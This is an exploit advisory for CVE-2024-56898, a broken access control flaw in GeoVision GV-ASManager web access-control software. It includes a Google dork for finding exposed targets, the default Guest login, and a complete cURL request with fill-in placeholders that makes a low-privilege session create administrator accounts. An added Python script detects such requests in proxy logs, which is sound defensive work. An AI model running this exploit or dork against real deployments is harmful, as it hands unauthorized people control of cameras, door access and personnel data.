
# Exploit Title: Broken Access Control in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56898
# PoC: https://github.com/DRAGOWN/CVE-2024-56898

Broken access control vulnerability in the GeoVision GV-ASManager web application, version 6.1.0.0 or earlier.

Requirements

To perform a successful attack, an attacker requires:

- GeoVision ASManager version 6.1.0.0 or earlier
- Network access to the GV-ASManager web application (in some deployments it is exposed to the public internet)
- Access to the Guest account (enabled by default) or any other low-privilege account (Username: Guest; Password: <blank>)

Impact

The vulnerability can be leveraged to perform the following unauthorized actions:

A low-privilege account that is not authorized to manage accounts is able to:

- Enable and disable any account.
- Create new accounts.
- Modify the privileges of any account.
- List accounts and their information.

After escalating privileges, an attacker will be able to:

- Access resources such as monitoring cameras, access cards, parking vehicles, employees and visitors, etc.
- Make changes to data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras and access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform the CVE-2024-56902 attack to retrieve cleartext passwords that can be reused against other digital assets of the organization.

cURL script:

# Replace every [SET-...] placeholder before running. curl computes
# Content-Length from the request body itself, so no hardcoded value is sent.
curl --path-as-is -i -s -k -X $'POST' \
  -H $'Host: [SET-TARGET]' \
  -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' \
  -H $'Sec-Ch-Ua-Mobile: ?0' \
  -H $'Sec-Ch-Ua-Platform: \"Linux\"' \
  -H $'Accept-Language: en-US,en;q=0.9' \
  -H $'Upgrade-Insecure-Requests: 1' \
  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' \
  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H $'Sec-Fetch-Site: cross-site' \
  -H $'Sec-Fetch-Mode: navigate' \
  -H $'Sec-Fetch-Dest: document' \
  -H $'Accept-Encoding: gzip, deflate, br' \
  -H $'Priority: u=0, i' \
  -H $'Connection: keep-alive' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
  --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \
  $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'

After a successful attack, you will get access to:

- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
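As an added defender-side example (not part of the original advisory or the vendor's code), the following Python flags account-management POSTs to the ASWebCommon.srf endpoint from the request above when they come from a session that is not an expected administrator. It assumes a reverse proxy or WAF in front of GV-ASManager logs each request as `<timestamp> <client_ip> <session_user> <method> <path> <form_body|->`; that log layout, the `admin` account name and the sample lines are constructed for illustration.

```python
from urllib.parse import parse_qs, urlparse

# Endpoint and action name are taken from the advisory's cURL request.
ACCOUNT_ENDPOINT = "/ASWeb/bin/ASWebCommon.srf"
ACCOUNT_ACTIONS = {"UA_SetCreateAccount"}
# Assumption: only these session users are expected to manage accounts.
AUTHORIZED_ADMINS = {"admin"}

# Constructed sample lines in an assumed proxy/WAF log layout:
# "<timestamp> <client_ip> <session_user> <method> <path> <form_body|->"
SAMPLE_LOG = """\
2025-02-02T10:00:01Z 10.0.0.5 admin POST /ASWeb/bin/ASWebCommon.srf action=UA_SetCreateAccount&id=ops1&password=x&email=ops%40corp.example&level=1
2025-02-02T10:00:07Z 10.0.0.9 Guest GET /ASWeb/Login -
2025-02-02T10:00:09Z 10.0.0.9 Guest POST /ASWeb/bin/ASWebCommon.srf action=UA_SetCreateAccount&id=newadmin&password=x&email=n%40corp.example&level=2
2025-02-02T10:00:12Z 10.0.0.9 Guest POST /ASWeb/bin/ASWebCommon.srf action=UA_Other&id=1
"""


def parse_line(line):
    """Split one log line into fields; the form body is URL-decoded into a dict."""
    ts, ip, user, method, path, body = line.split(" ", 5)
    return {"ts": ts, "ip": ip, "user": user, "method": method,
            "path": urlparse(path).path,
            "body": parse_qs(body) if body != "-" else {}}


def find_unauthorized_account_changes(log_text):
    """Return one alert per account-management POST from a non-admin session.

    Account creation by an authorized admin is normal traffic; the same action
    from Guest (or any other low-privilege session) is the vulnerability being
    exercised. The requested level (2 = administrator) shows the severity.
    """
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec["method"] != "POST" or rec["path"] != ACCOUNT_ENDPOINT:
            continue
        action = rec["body"].get("action", [""])[0]
        if action in ACCOUNT_ACTIONS and rec["user"] not in AUTHORIZED_ADMINS:
            alerts.append({"ts": rec["ts"], "ip": rec["ip"], "user": rec["user"],
                           "action": action,
                           "new_account": rec["body"].get("id", [""])[0],
                           "level": rec["body"].get("level", [""])[0]})
    return alerts
```

Running `find_unauthorized_account_changes(SAMPLE_LOG)` on the constructed lines yields a single alert for the Guest session that requested an administrator-level account.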